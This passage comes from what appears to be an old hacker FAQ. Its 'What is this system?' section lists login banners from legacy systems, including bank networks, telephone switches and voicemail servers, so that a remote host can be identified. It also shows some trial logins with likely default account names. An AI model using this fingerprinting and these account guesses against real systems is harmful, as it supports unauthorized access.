characters for the control-character C assignment.
If C is preceded by a caret (^) (escaped from the
shell), then the value used is the corresponding
control character (for example, ^D is a <Ctrl>d;
^? is interpreted as DELETE and ^- is interpreted
as undefined).
Use the stty -a command to see your current stty settings, and to
determine which one is causing you problems.
---------------------------------------------------------------------------
A-17. What is this system?
AIX
~~~
IBM AIX Version 3 for RISC System/6000
(C) Copyrights by IBM and by others 1982, 1990.
login:
[You will know an AIX system because it is the only Unix system that]
[clears the screen and issues a login prompt near the bottom of the]
[screen]
AS/400
~~~~~~
UserID?
Password?
Once in, type GO MAIN
CDC Cyber
~~~~~~~~~
WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.
88/02/16. 02.36.53. N265100
CSUS CYBER 170-730. NOS 2.5.2-678/3.
FAMILY:
You would normally just hit return at the family prompt. Next prompt
is:
USER NAME:
CISCO Router
~~~~~~~~~~~~
FIRST BANK OF TNO
95-866 TNO VirtualBank
REMOTE Router - TN043R1
Console Port
SN - 00000866
TN043R1>
DECserver
~~~~~~~~~
DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
DPS502-DS700
(c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
Please type HELP if you need assistance
Enter username> TNO
Local>
Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
MPE XL:
EXPECTED A :HELLO COMMAND. (CIERR 6057)
MPE XL:
EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
MPE XL:
GTN
~~~
WELCOME TO CITIBANK. PLEASE SIGN ON.
XXXXXXXX
@
PASSWORD =
@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PLEASE ENTER YOUR ID:-1->
PLEASE ENTER YOUR PASSWORD:-2->
CITICORP (CITY NAME). KEY GHELP FOR HELP.
XXX.XXX
PLEASE SELECT SERVICE REQUIRED.-3->
Lantronix Terminal Server
~~~~~~~~~~~~~~~~~~~~~~~~~
Lantronix ETS16 Version V3.1/1(940623)
Type HELP at the 'Local_15> ' prompt for assistance.
Login password>
Meridian Mail (Northern Telecom Phone/Voice Mail System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MMM MM MERIDIAN
MMMMM MMMMM
MMMMMM MMMMMM
MMM MMMMM MMM MMMMM MMMMM
MMM MMM MMM MMMMMM MMMMMM
MMM MMM MMM MMM MMM MMM
MMM MMM MMM MMMMM MMM
MMM MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
Copyright (c) Northern
Telecom, 1991
Novell ONLAN
~~~~~~~~~~~~
<Control-A aka smiley face>N
[To access the systems it is best to own a copy of ONLAN/PC]
PC-Anywhere
~~~~~~~~~~~
<Control-A aka smiley face>P
[To access the systems it is best to own a copy of PCAnywhere Remote]
PRIMOS
~~~~~~
PRIMENET 19.2.7F PPOA1
<any text>
ER!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CONNECT
Primenet V 2.3 (system)
LOGIN (you)
User id? (system)
SAPB5 (you)
Password? (system)
DROWSAP (you)
OK, (system)
ROLM CBX II
~~~~~~~~~~~
ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568
BIND DATE: 7/APR/93
COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.
ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
YOU HAVE ENTERED CPU 1
12:38:47 ON WEDNESDAY 2/15/1995
USERNAME: op
PASSWORD:
INVALID USERNAME-PASSWORD PAIR
ROLM-OSL
~~~~~~~~
MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47
RELEASE 8003
OSL, PLEASE.
?
ROLM PhoneMail
~~~~~~~~~~~~~~
ROLM PhoneMail 9252 9254 Microcode Version 4.2
Copyright (C) ROLM Systems 1991
All Rights Reserved.
PM Login>
PM Password>
���
System75
~~~~~~~~
Login: root
INCORRECT LOGIN
Login: browse
Password:
Software Version: G3s.b16.2.2
Terminal Type (513, 4410, 4425): [513]
Tops-10
~~~~~~~
NIH Timesharing
NIH Tri-SMP 7.02-FF 16:30:04 TTY11
system 1378/1381/1453 Connected to Node Happy(40) Line # 12
Please LOGIN
